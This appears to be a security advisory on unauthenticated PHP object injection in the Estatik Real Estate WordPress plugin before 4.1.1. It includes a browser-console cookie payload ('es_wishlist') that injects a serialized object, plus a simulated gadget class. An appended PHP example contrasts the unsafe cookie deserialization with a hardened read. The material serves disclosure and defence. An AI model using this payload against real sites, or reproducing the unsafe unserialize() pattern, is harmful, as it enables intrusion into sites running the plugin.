wpexploit
Krzysztof Zając (CERT PL)
WPEX-ID:8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7
Dec 25, 2023 - 12:00 a.m.

Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection

estatik
real estate
unauthenticated access
php object injection
gadget chain
plugin vulnerability
arbitrary deserialization

AI Score: 7.2 High (Confidence: Low)

EPSS: 0.003 Low (Percentile: 69.7%)

Description

The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog.

To simulate a gadget chain, put the following code in a plugin:
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then, while on the blog as an unauthenticated visitor, run the command below in the web browser's developer console and reload the page to see the "Arbitrary deserialization" message.

document.cookie='es_wishlist=O:4:"Evil":0:{}'
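
An added example, not Estatik's code or its 4.1.1 fix: the unsafe cookie read described above next to a hardened read that never instantiates objects. The function names and the assumption that the cookie should hold a list of positive integer IDs are hypothetical, and this Evil class sets a flag instead of calling die() so the script can continue.

```php
<?php
declare(strict_types=1);

// Stand-in gadget: same __wakeup() hook as the advisory's Evil class,
// but it records that it ran instead of terminating the request.
final class Evil
{
    public static bool $woke = false;

    public function __wakeup(): void
    {
        self::$woke = true;
    }
}

// Vulnerable pattern: any class loaded on the site can be instantiated
// from attacker-controlled cookie bytes, firing its magic methods.
function read_wishlist_unsafe(string $cookie)
{
    return unserialize($cookie);
}

// Hardened pattern: allowed_classes => false turns every serialized object
// into an inert __PHP_Incomplete_Class, so no __wakeup()/__destruct() of a
// real class runs. The result is then reduced to the expected shape.
function read_wishlist_safe(string $cookie): array
{
    $data = @unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return [];
    }
    // Assumed shape: a flat list of positive integer IDs; drop anything else.
    return array_values(array_filter($data, static fn ($v) => is_int($v) && $v > 0));
}

$payload = 'O:4:"Evil":0:{}';                      // cookie value from the advisory
$nested  = 'a:2:{i:0;i:7;i:1;O:4:"Evil":0:{}}';    // constructed: object hidden in an array
$legit   = serialize([12, 34]);                    // constructed: well-formed wishlist

foreach ([$payload, $nested, $legit] as $cookie) {
    echo json_encode(read_wishlist_safe($cookie)), PHP_EOL;
}
echo 'gadget ran after safe reads: ', var_export(Evil::$woke, true), PHP_EOL;

read_wishlist_unsafe($payload);
echo 'gadget ran after unsafe read: ', var_export(Evil::$woke, true), PHP_EOL;
```

Storing such cookies as JSON and reading them with json_decode() avoids unserialize() on request data altogether.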
